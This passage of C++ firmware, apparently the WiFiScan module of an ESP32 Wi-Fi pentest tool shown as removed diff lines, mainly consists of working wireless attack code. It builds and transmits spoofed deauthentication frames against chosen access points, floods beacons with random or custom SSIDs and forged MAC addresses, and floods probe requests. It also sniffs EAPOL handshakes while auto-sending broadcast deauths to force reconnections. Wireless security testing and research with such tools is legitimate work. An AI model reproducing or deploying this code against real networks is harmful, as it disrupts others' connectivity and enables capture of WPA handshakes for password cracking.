- for (int i = 0; i < snifferPacket->payload[37]; i++)
- {
- Serial.print((char)snifferPacket->payload[i + 38]);
- display_string.concat((char)snifferPacket->payload[i + 38]);
- }
- int temp_len = display_string.length();
- #ifdef HAS_SCREEN
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.print(" ");
-
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- void WiFiScan::deauthSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0xA0 || snifferPacket->payload[0] == 0xC0 ) && (buf == 0))
- {
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- Serial.print(addr);
- display_string.concat(text_table4[0]);
- display_string.concat(snifferPacket->rx_ctrl.rssi);
- display_string.concat(" ");
- display_string.concat(addr);
- #ifdef HAS_SCREEN
- for (int i = 0; i < 19 - snifferPacket->payload[37]; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.print(" ");
-
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- void WiFiScan::probeSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0x40) && (buf == 0))
- {
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" Client: ");
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- Serial.print(addr);
- display_string.concat(addr);
- Serial.print(" Requesting: ");
- display_string.concat(" -> ");
- for (int i = 0; i < snifferPacket->payload[25]; i++)
- {
- Serial.print((char)snifferPacket->payload[26 + i]);
- display_string.concat((char)snifferPacket->payload[26 + i]);
- }
- // Print spaces because of the rotating lines of the hardware scroll.
- // The same characters print from previous lines so I just overwrite them
- // with spaces.
- #ifdef HAS_SCREEN
- for (int i = 0; i < 19 - snifferPacket->payload[25]; i++)
- {
- display_string.concat(" ");
- }
-
- if (display_obj.display_buffer->size() == 0)
- {
- //while (display_obj.printing)
- // delay(1);
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- String essid = "";
- bool found = false;
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0x40) && (buf == 0))
- {
- for (uint8_t i = 0; i < snifferPacket->payload[25]; i++)
- {
- essid.concat((char)snifferPacket->payload[26 + i]);
- }
- for (int i = 0; i < ssids->size(); i++) {
- if (ssids->get(i).essid == essid) {
- Serial.println("Found a sheep");
- found = true;
- break;
- }
- }
- if (!found)
- return;
-
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" Client: ");
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- Serial.print(addr);
- display_string.concat(addr);
- Serial.print(" Requesting: ");
- display_string.concat(" -> ");
- // ESSID
- for (int i = 0; i < snifferPacket->payload[25]; i++)
- {
- Serial.print((char)snifferPacket->payload[26 + i]);
- display_string.concat((char)snifferPacket->payload[26 + i]);
- }
- // Print spaces because of the rotating lines of the hardware scroll.
- // The same characters print from previous lines so I just overwrite them
- // with spaces.
- #ifdef HAS_SCREEN
- for (int i = 0; i < 19 - snifferPacket->payload[25]; i++)
- {
- display_string.concat(" ");
- }
-
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- /*
- void WiFiScan::broadcastAPBeacon(uint32_t currentTime, AccessPoint custom_ssid) {
- set_channel = random(1,12);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- // Randomize SRC MAC
- packet[10] = packet[16] = custom_ssid.bssid[0];
- packet[11] = packet[17] = custom_ssid.bssid[1];
- packet[12] = packet[18] = custom_ssid.bssid[2];
- packet[13] = packet[19] = custom_ssid.bssid[3];
- packet[14] = packet[20] = custom_ssid.bssid[4];
- packet[15] = packet[21] = custom_ssid.bssid[5];
- char ESSID[custom_ssid.essid.length() + 1] = {};
- custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
- }*/
- void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
- set_channel = random(1,12);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- if (custom_ssid.beacon->size() == 0)
- return;
- // Randomize SRC MAC
- // Randomize SRC MAC
- packet[10] = packet[16] = random(256);
- packet[11] = packet[17] = random(256);
- packet[12] = packet[18] = random(256);
- packet[13] = packet[19] = random(256);
- packet[14] = packet[20] = random(256);
- packet[15] = packet[21] = random(256);
- char ESSID[custom_ssid.essid.length() + 1] = {};
- custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
- int realLen = strlen(ESSID);
- int ssidLen = random(realLen, 33);
- int numSpace = ssidLen - realLen;
- //int rand_len = sizeof(rand_reg);
- int fullLen = ssidLen;
- packet[37] = fullLen;
- // Insert my tag
- for(int i = 0; i < realLen; i++)
- packet[38 + i] = ESSID[i];
- for(int i = 0; i < numSpace; i++)
- packet[38 + realLen + i] = 0x20;
- /////////////////////////////
-
- packet[50 + fullLen] = set_channel;
- uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
- 0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
- // Add everything that goes after the SSID
- //for(int i = 0; i < 12; i++)
- // packet[38 + fullLen + i] = postSSID[i];
- packet[34] = custom_ssid.beacon->get(0);
- packet[35] = custom_ssid.beacon->get(1);
-
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- packets_sent = packets_sent + 3;
- }
- void WiFiScan::broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid) {
- set_channel = random(1,12);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- // Randomize SRC MAC
- packet[10] = packet[16] = custom_ssid.bssid[0];
- packet[11] = packet[17] = custom_ssid.bssid[1];
- packet[12] = packet[18] = custom_ssid.bssid[2];
- packet[13] = packet[19] = custom_ssid.bssid[3];
- packet[14] = packet[20] = custom_ssid.bssid[4];
- packet[15] = packet[21] = custom_ssid.bssid[5];
- char ESSID[custom_ssid.essid.length() + 1] = {};
- custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
- int ssidLen = strlen(ESSID);
- //int rand_len = sizeof(rand_reg);
- int fullLen = ssidLen;
- packet[37] = fullLen;
- // Insert my tag
- for(int i = 0; i < ssidLen; i++)
- packet[38 + i] = ESSID[i];
- /////////////////////////////
-
- packet[50 + fullLen] = set_channel;
- uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
- 0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
- // Add everything that goes after the SSID
- for(int i = 0; i < 12; i++)
- packet[38 + fullLen + i] = postSSID[i];
-
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- packets_sent = packets_sent + 3;
- }
- // Function to send beacons with random ESSID length
- void WiFiScan::broadcastSetSSID(uint32_t current_time, char* ESSID) {
- set_channel = random(1,12);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- // Randomize SRC MAC
- packet[10] = packet[16] = random(256);
- packet[11] = packet[17] = random(256);
- packet[12] = packet[18] = random(256);
- packet[13] = packet[19] = random(256);
- packet[14] = packet[20] = random(256);
- packet[15] = packet[21] = random(256);
- int ssidLen = strlen(ESSID);
- //int rand_len = sizeof(rand_reg);
- int fullLen = ssidLen;
- packet[37] = fullLen;
- // Insert my tag
- for(int i = 0; i < ssidLen; i++)
- packet[38 + i] = ESSID[i];
- /////////////////////////////
-
- packet[50 + fullLen] = set_channel;
- uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
- 0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
- // Add everything that goes after the SSID
- for(int i = 0; i < 12; i++)
- packet[38 + fullLen + i] = postSSID[i];
-
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- packets_sent = packets_sent + 3;
-
- }
- // Function for sending crafted beacon frames
- void WiFiScan::broadcastRandomSSID(uint32_t currentTime) {
- set_channel = random(1,12);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- // Randomize SRC MAC
- packet[10] = packet[16] = random(256);
- packet[11] = packet[17] = random(256);
- packet[12] = packet[18] = random(256);
- packet[13] = packet[19] = random(256);
- packet[14] = packet[20] = random(256);
- packet[15] = packet[21] = random(256);
- packet[37] = 6;
-
-
- // Randomize SSID (Fixed size 6. Lazy right?)
- packet[38] = alfa[random(65)];
- packet[39] = alfa[random(65)];
- packet[40] = alfa[random(65)];
- packet[41] = alfa[random(65)];
- packet[42] = alfa[random(65)];
- packet[43] = alfa[random(65)];
-
- packet[56] = set_channel;
- uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
- 0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
- // Add everything that goes after the SSID
- for(int i = 0; i < 12; i++)
- packet[38 + 6 + i] = postSSID[i];
- esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
- //ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false));
- //ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false));
- packets_sent = packets_sent + 3;
- }
- // Function to send probe flood to all "active" access points
- void WiFiScan::sendProbeAttack(uint32_t currentTime) {
- // Itterate through all access points in list
- for (int i = 0; i < access_points->size(); i++) {
- // Check if active
- if (access_points->get(i).selected) {
- this->set_channel = access_points->get(i).channel;
- esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
-
- // Build packet
- // Randomize SRC MAC
-
- prob_req_packet[10] = random(256);
- prob_req_packet[11] = random(256);
- prob_req_packet[12] = random(256);
- prob_req_packet[13] = random(256);
- prob_req_packet[14] = random(256);
- prob_req_packet[15] = random(256);
- // Set SSID length
- int ssidLen = access_points->get(i).essid.length();
- //int rand_len = sizeof(rand_reg);
- int fullLen = ssidLen;
- prob_req_packet[25] = fullLen;
- // Insert ESSID
- char buf[access_points->get(i).essid.length() + 1] = {};
- access_points->get(i).essid.toCharArray(buf, access_points->get(i).essid.length() + 1);
-
- for(int i = 0; i < ssidLen; i++)
- prob_req_packet[26 + i] = buf[i];
-
- /*
- * 0x01, 0x08, 0x8c, 0x12, 0x18, 0x24,
- 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a,
- 0xad, 0x01, 0x17, 0xff, 0xff, 0x00,
- 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00
- */
- uint8_t postSSID[40] = {0x00, 0x00, 0x01, 0x08, 0x8c, 0x12,
- 0x18, 0x24, 0x30, 0x48, 0x60, 0x6c,
- 0x2d, 0x1a, 0xad, 0x01, 0x17, 0xff,
- 0xff, 0x00, 0x00, 0x7e, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00};
- uint8_t good_probe_req_packet[26 + fullLen + 40] = {};
-
- for (int i = 0; i < 26 + fullLen; i++)
- good_probe_req_packet[i] = prob_req_packet[i];
- for(int i = 0; i < 40; i++)
- good_probe_req_packet[26 + fullLen + i] = postSSID[i];
-
- // Send packet
- esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
- packets_sent = packets_sent + 3;
- }
- }
- }
- void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
- // Itterate through all access points in list
- // Check if active
- WiFiScan::set_channel = channel;
- esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
-
- // Build packet
-
- deauth_frame_default[10] = bssid[0];
- deauth_frame_default[11] = bssid[1];
- deauth_frame_default[12] = bssid[2];
- deauth_frame_default[13] = bssid[3];
- deauth_frame_default[14] = bssid[4];
- deauth_frame_default[15] = bssid[5];
- deauth_frame_default[16] = bssid[0];
- deauth_frame_default[17] = bssid[1];
- deauth_frame_default[18] = bssid[2];
- deauth_frame_default[19] = bssid[3];
- deauth_frame_default[20] = bssid[4];
- deauth_frame_default[21] = bssid[5];
- // Send packet
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- packets_sent = packets_sent + 3;
- }
- void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
- // Itterate through all access points in list
- for (int i = 0; i < access_points->size(); i++) {
- // Check if active
- if (access_points->get(i).selected) {
- this->set_channel = access_points->get(i).channel;
- esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
-
- // Build packet
-
- deauth_frame_default[10] = access_points->get(i).bssid[0];
- deauth_frame_default[11] = access_points->get(i).bssid[1];
- deauth_frame_default[12] = access_points->get(i).bssid[2];
- deauth_frame_default[13] = access_points->get(i).bssid[3];
- deauth_frame_default[14] = access_points->get(i).bssid[4];
- deauth_frame_default[15] = access_points->get(i).bssid[5];
- deauth_frame_default[16] = access_points->get(i).bssid[0];
- deauth_frame_default[17] = access_points->get(i).bssid[1];
- deauth_frame_default[18] = access_points->get(i).bssid[2];
- deauth_frame_default[19] = access_points->get(i).bssid[3];
- deauth_frame_default[20] = access_points->get(i).bssid[4];
- deauth_frame_default[21] = access_points->get(i).bssid[5];
- // Send packet
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
- packets_sent = packets_sent + 3;
- }
- }
- }
- void WiFiScan::wifiSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- #ifdef HAS_SCREEN
- int buff = display_obj.display_buffer->size();
- #else
- int buff = 0;
- #endif
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifndef MARAUDER_MINI
- if (snifferPacket->payload[0] == 0x80)
- {
- num_beacon++;
- }
- else if ((snifferPacket->payload[0] == 0xA0 || snifferPacket->payload[0] == 0xC0 ))
- {
- num_deauth++;
- }
- else if (snifferPacket->payload[0] == 0x40)
- {
- num_probe++;
- }
- #endif
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- display_string.concat(addr);
- int temp_len = display_string.length();
- #ifdef HAS_SCREEN
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- //Serial.print(" ");
-
- #ifdef MARAUDER_MINI
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
- #endif
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- void WiFiScan::eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
- bool send_deauth = settings_obj.loadSetting<bool>(text_table4[5]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- }
- #ifdef HAS_SCREEN
- int buff = display_obj.display_buffer->size();
- #else
- int buff = 0;
- #endif
- // Found beacon frame. Decide whether to deauth
- if (send_deauth) {
- if (snifferPacket->payload[0] == 0x80) {
- // Build packet
-
- uint8_t new_packet[26] = {
- 0xc0, 0x00, 0x3a, 0x01,
- 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0xf0, 0xff, 0x02, 0x00
- };
-
- new_packet[10] = snifferPacket->payload[10];
- new_packet[11] = snifferPacket->payload[11];
- new_packet[12] = snifferPacket->payload[12];
- new_packet[13] = snifferPacket->payload[13];
- new_packet[14] = snifferPacket->payload[14];
- new_packet[15] = snifferPacket->payload[15];
-
- new_packet[16] = snifferPacket->payload[10];
- new_packet[17] = snifferPacket->payload[11];
- new_packet[18] = snifferPacket->payload[12];
- new_packet[19] = snifferPacket->payload[13];
- new_packet[20] = snifferPacket->payload[14];
- new_packet[21] = snifferPacket->payload[15];
-
- // Send packet
- //esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- //esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- delay(1);
- }
- }
- if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){
- num_eapol++;
- Serial.println("Received EAPOL:");
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- display_string.concat(addr);
- int temp_len = display_string.length();
- #ifdef HAS_SCREEN
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
- Serial.print(" ");
- #ifdef MARAUDER_MINI
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
- #endif
-
- // for (int i = 0; i < len; i++) {
- // char hexCar[4];
- // sprintf(hexCar, "%02X", snifferPacket->payload[i]);
- // Serial.print(hexCar);
- //Serial.print(snifferPacket->payload[i], HEX);
- // if ((i + 1) % 16 == 0)
- // Serial.print("\n");
- // else
- // Serial.print(" ");
- // }
-
- // Serial.print("\n");
- }
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- void WiFiScan::activeEapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
- bool send_deauth = settings_obj.loadSetting<bool>(text_table4[5]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- }
- // Found beacon frame. Decide whether to deauth
- if (snifferPacket->payload[0] == 0x80) {
- // Build packet
- //Serial.println("Recieved beacon frame");
- uint8_t new_packet[26] = {
- 0xc0, 0x00, 0x3a, 0x01,
- 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0xf0, 0xff, 0x02, 0x00
- };
-
- new_packet[10] = snifferPacket->payload[10];
- new_packet[11] = snifferPacket->payload[11];
- new_packet[12] = snifferPacket->payload[12];
- new_packet[13] = snifferPacket->payload[13];
- new_packet[14] = snifferPacket->payload[14];
- new_packet[15] = snifferPacket->payload[15];
-
- new_packet[16] = snifferPacket->payload[10];
- new_packet[17] = snifferPacket->payload[11];
- new_packet[18] = snifferPacket->payload[12];
- new_packet[19] = snifferPacket->payload[13];
- new_packet[20] = snifferPacket->payload[14];
- new_packet[21] = snifferPacket->payload[15];
-
- // Send packet
- //esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- //esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false);
- delay(1);
- }
- if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){
- num_eapol++;
- Serial.println("Received EAPOL:");
- // for (int i = 0; i < len; i++) {
- // char hexCar[3];
- // snprintf(hexCar, 3, "%02X", snifferPacket->payload[i]);
- // Serial.print(hexCar);
- //Serial.print(snifferPacket->payload[i], HEX);
- // if ((i + 1) % 16 == 0)
- // Serial.print("\n");
- // else
- // Serial.print(" ");
- // }
-
- // Serial.print("\n");
- }
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- #ifdef HAS_SCREEN
- void WiFiScan::eapolMonitorMain(uint32_t currentTime)
- {
- //---------MAIN 'FOR' LOOP! THIS IS WHERE ALL THE ACTION HAPPENS! HAS TO BE FAST!!!!!---------\\
-
-
- // for (x_pos = (11 + x_scale); x_pos <= 320; x_pos += x_scale) //go along every point on the x axis and do something, start over when finished
- for (x_pos = (11 + x_scale); x_pos <= 320; x_pos = x_pos)
- {
- currentTime = millis();
- do_break = false;
-
- y_pos_x = 0;
- y_pos_y = 0;
- y_pos_z = 0;
- boolean pressed = false;
-
- uint16_t t_x = 0, t_y = 0; // To store the touch coordinates
-
- // Do the touch stuff
- pressed = display_obj.tft.getTouch(&t_x, &t_y);
-
- if (pressed) {
- Serial.print("Got touch | X: ");
- Serial.print(t_x);
- Serial.print(" Y: ");
- Serial.println(t_y);
- }
-
-
- // Check buttons for presses
- for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
- {
- if (pressed && display_obj.key[b].contains(t_x, t_y))
- {
- display_obj.key[b].press(true);
- } else {
- display_obj.key[b].press(false);
- }
- }
-
- // Which buttons pressed
- for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
- {
- if (display_obj.key[b].justPressed())
- {
- Serial.println("Bro, key pressed");
- //do_break = true;
- }
-
- if (display_obj.key[b].justReleased())
- {
- do_break = true;
-
- // Channel - button pressed
- if (b == 4) {
- if (set_channel > 1) {
- Serial.println("Shit channel down");
- set_channel--;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- //display_obj.tftDrawXScaleButtons(x_scale);
- //display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- changeChannel();
- break;
- }
- }
-
- // Channel + button pressed
- else if (b == 5) {
- if (set_channel < MAX_CHANNEL) {
- Serial.println("Shit channel up");
- set_channel++;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- //display_obj.tftDrawXScaleButtons(x_scale);
- //display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- changeChannel();
- break;
- }
- }
- else if (b == 6) {
- Serial.println("Exiting packet monitor...");
- this->StartScan(WIFI_SCAN_OFF);
- //display_obj.tft.init();
- this->orient_display = true;
- return;
- }
- }
- }
-
- if (currentTime - initTime >= (GRAPH_REFRESH * 5)) {
- //Serial.println("-----------------------------------------");
- //Serial.println("Time elapsed: " + (String)(currentTime - initTime) + "ms");
- x_pos += x_scale;
- initTime = millis();
- y_pos_x = ((-num_eapol * (y_scale * 3)) + (HEIGHT_1 - 2)); // GREEN
- if (y_pos_x >= HEIGHT_1) {
- Serial.println("Max EAPOL number reached. Adjusting...");
- num_eapol = 0;
- }
